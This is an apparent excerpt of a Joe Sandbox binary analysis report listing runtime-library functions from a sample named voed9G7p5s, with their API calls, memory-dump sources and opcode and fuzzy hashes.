                                                                                                    • Opcode ID: 0da56fedebf108353ad5e90e21a135c410f5e3122c7fb9384f9efde6f8e26877
                                                                                                    • Instruction ID: 7c5c3480be94be314ff6b5af973987cee2843adf733430c625e8ad23d3b78785
                                                                                                    • Opcode Fuzzy Hash: 0da56fedebf108353ad5e90e21a135c410f5e3122c7fb9384f9efde6f8e26877
                                                                                                    • Instruction Fuzzy Hash: F64191B1940658AADF219B60DC45FEE77FDEB05344F4090A6FA09F7081EAB48AC5CF61
                                                                                                    Function 00E22900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E22937
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00E2293F
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E229C8
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00E229F3
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00E22A48
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 14479ddc65f19adcb9b770870e6e17736981610071dfc5e0da64a061ee13f225
                                                                                                    • Instruction ID: 3c59429e2cb994c311667c93e361b7ffd4aac7c9e22e07167b35b483c5c56020
                                                                                                    • Opcode Fuzzy Hash: 14479ddc65f19adcb9b770870e6e17736981610071dfc5e0da64a061ee13f225
                                                                                                    • Instruction Fuzzy Hash: F441C034A00228AFCF14DF28D885A9EBFF1AF45328F149069E915BB392D731DA45CF90
                                                                                                    Function 00E19955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                    • API String ID: 176396367-3743748572
                                                                                                    • Opcode ID: e7d163dca7c0ac27bfea725032184313fa5bbfdf05b426eee7a1849e05e849c1
                                                                                                    • Instruction ID: 9a2cdcfd5078d1f8860e6abed9217e889dc584e6fcb0bf3eade6ead46dca5158
                                                                                                    • Opcode Fuzzy Hash: e7d163dca7c0ac27bfea725032184313fa5bbfdf05b426eee7a1849e05e849c1
                                                                                                    • Instruction Fuzzy Hash: 2631693264434556DA30AF90AC12BFA73E4EF80724F60541EF482772C2FA64AEC883A1
                                                                                                    Function 00E2C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E2C868: _free.LIBCMT ref: 00E2C891
                                                                                                    • _free.LIBCMT ref: 00E2C8F2
                                                                                                      • Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
                                                                                                      • Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4
                                                                                                    • _free.LIBCMT ref: 00E2C8FD
                                                                                                    • _free.LIBCMT ref: 00E2C908
                                                                                                    • _free.LIBCMT ref: 00E2C95C
                                                                                                    • _free.LIBCMT ref: 00E2C967
                                                                                                    • _free.LIBCMT ref: 00E2C972
                                                                                                    • _free.LIBCMT ref: 00E2C97D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                    • Instruction ID: a9be902c44ff4dd9274e1a59d483c16c503f3629d3a33e56d24692b1c580f07a
                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                    • Instruction Fuzzy Hash: 6A111F71581B24AAE528B7B1EC07FCF7BEC9F04B00F609C15F29D760A2DA65B5098B50
                                                                                                    Function 00E1E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E1E669,00E1E5CC,00E1E86D), ref: 00E1E605
                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E1E61B
                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E1E630
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                    • API String ID: 667068680-1718035505
                                                                                                    • Opcode ID: af639583ce4e39bf19a3f8e2ddf72df6f532165c3d50961faee58d9bdba31a0d
                                                                                                    • Instruction ID: 9a5024385057652fe3c5d7c89fa7e11a9525539ab9fbb3f8945d621e4492307b
                                                                                                    • Opcode Fuzzy Hash: af639583ce4e39bf19a3f8e2ddf72df6f532165c3d50961faee58d9bdba31a0d
                                                                                                    • Instruction Fuzzy Hash: 09F0C2727802229F8B264F766C889EA66C96F257893443479FD05F3310EB50CCD89A90
                                                                                                    Function 00E28900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 00E2891E
                                                                                                      • Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
                                                                                                      • Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4
                                                                                                    • _free.LIBCMT ref: 00E28930
                                                                                                    • _free.LIBCMT ref: 00E28943
                                                                                                    • _free.LIBCMT ref: 00E28954
                                                                                                    • _free.LIBCMT ref: 00E28965
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID: p
                                                                                                    • API String ID: 776569668-2678736219
                                                                                                    • Opcode ID: 087211a04c9b8e799836097e8b978d017e4666f1d1f3c10394069950e5903e48
                                                                                                    • Instruction ID: af36624578b68cc1361f5ba2ff41207e639dae01e3761f5c22c776479aa05e53
                                                                                                    • Opcode Fuzzy Hash: 087211a04c9b8e799836097e8b978d017e4666f1d1f3c10394069950e5903e48
                                                                                                    • Instruction Fuzzy Hash: C7F03A718129368F96066F16FE0240A3FE9F724764300290AF218B23B5CBB9495DDB81
                                                                                                    Function 00E1146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E114C2
                                                                                                      • Part of subcall function 00E0B146: GetVersionExW.KERNEL32(?), ref: 00E0B16B
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E114E6
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E11500
                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00E11513
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11523
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11533
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2092733347-0
                                                                                                    • Opcode ID: 0d222a9e0499f701ceb05f95ce36f7f687cf310fbacd0fdc9f8b756ccf05d105
                                                                                                    • Instruction ID: 1c49044548ca06d95bd55dbd7d888d8ce1fec0e4395f11d947d92ddbff8020c7
                                                                                                    • Opcode Fuzzy Hash: 0d222a9e0499f701ceb05f95ce36f7f687cf310fbacd0fdc9f8b756ccf05d105
                                                                                                    • Instruction Fuzzy Hash: 5631F77910834AAFC704DFA9C88499BBBE8FF98714F005A1EF995D3210E730D549CBA6
                                                                                                    Function 00E22AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00E22AF1,00E202FC,00E1FA34), ref: 00E22B08
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E22B16
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E22B2F
                                                                                                    • SetLastError.KERNEL32(00000000,00E22AF1,00E202FC,00E1FA34), ref: 00E22B81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: ff700202347a9a1c257465d6066da5ea0623f6cc7a2f51f2a502b50c5b3539a5
                                                                                                    • Instruction ID: 1dba4cf7bfa3ecb36fb4383f01448f0937e9911ab7ff6e421b2db7a1db700a31
                                                                                                    • Opcode Fuzzy Hash: ff700202347a9a1c257465d6066da5ea0623f6cc7a2f51f2a502b50c5b3539a5
                                                                                                    • Instruction Fuzzy Hash: EC01F7321093397EEA242B767C89A672FD9EF11778760273EF210751E0EF554D049544
                                                                                                    Function 00E297E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,00E41098,00E24674,00E41098,?,?,00E240EF,?,?,00E41098), ref: 00E297E9
                                                                                                    • _free.LIBCMT ref: 00E2981C
                                                                                                    • _free.LIBCMT ref: 00E29844
                                                                                                    • SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E29851
                                                                                                    • SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E2985D
                                                                                                    • _abort.LIBCMT ref: 00E29863
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3160817290-0
                                                                                                    • Opcode ID: 217453550db31307d0290b1ab448761b444695f27b77dcaac100da28a043c99f
                                                                                                    • Instruction ID: 529a74c31e009a5220074e209b304fcb9122b64e880a8b07cde1938a51fcb458
                                                                                                    • Opcode Fuzzy Hash: 217453550db31307d0290b1ab448761b444695f27b77dcaac100da28a043c99f
                                                                                                    • Instruction Fuzzy Hash: 90F0A9351406316BC61D33357D09F5B1EA99FD2775F293134F615B21D3EE20880A4555
                                                                                                    Function 00E1DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E1DC47
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1DC61
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1DC72
                                                                                                    • TranslateMessage.USER32(?), ref: 00E1DC7C
                                                                                                    • DispatchMessageW.USER32(?), ref: 00E1DC86
                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E1DC91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 2148572870-0
                                                                                                    • Opcode ID: 182f72bcdcb93e60a1f8d111c23c3f38a3145ad1c65a36b7fc261ad3dd56ad3d
                                                                                                    • Instruction ID: 587f12efab581145063f1861070b7db33d4386e85f69bf0bbf91040045ee215c
                                                                                                    • Opcode Fuzzy Hash: 182f72bcdcb93e60a1f8d111c23c3f38a3145ad1c65a36b7fc261ad3dd56ad3d
                                                                                                    • Instruction Fuzzy Hash: 76F0EC72A01219BBCB206BA6ED4CDDBBF6DEF42796B004411F50AF2051D675968ACBE0
                                                                                                    Function 00E1A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E1A699: GetDC.USER32(00000000), ref: 00E1A69D
                                                                                                      • Part of subcall function 00E1A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E1A6A8
                                                                                                      • Part of subcall function 00E1A699: ReleaseDC.USER32(00000000,00000000), ref: 00E1A6B3
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00E1A83C
                                                                                                      • Part of subcall function 00E1AAC9: GetDC.USER32(00000000), ref: 00E1AAD2
                                                                                                      • Part of subcall function 00E1AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00E1AB01
                                                                                                      • Part of subcall function 00E1AAC9: ReleaseDC.USER32(00000000,?), ref: 00E1AB99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                    • String ID: "$($A
                                                                                                    • API String ID: 1061551593-2217482528
                                                                                                    • Opcode ID: f15faec05421548c988db8381bfcea1f584c9151858dd76618cf7193db45f785
                                                                                                    • Instruction ID: 6be9832cefd117b4bf032a0320e47b8513f4f2a92cbe34d2873ede57fb147bd8
                                                                                                    • Opcode Fuzzy Hash: f15faec05421548c988db8381bfcea1f584c9151858dd76618cf7193db45f785
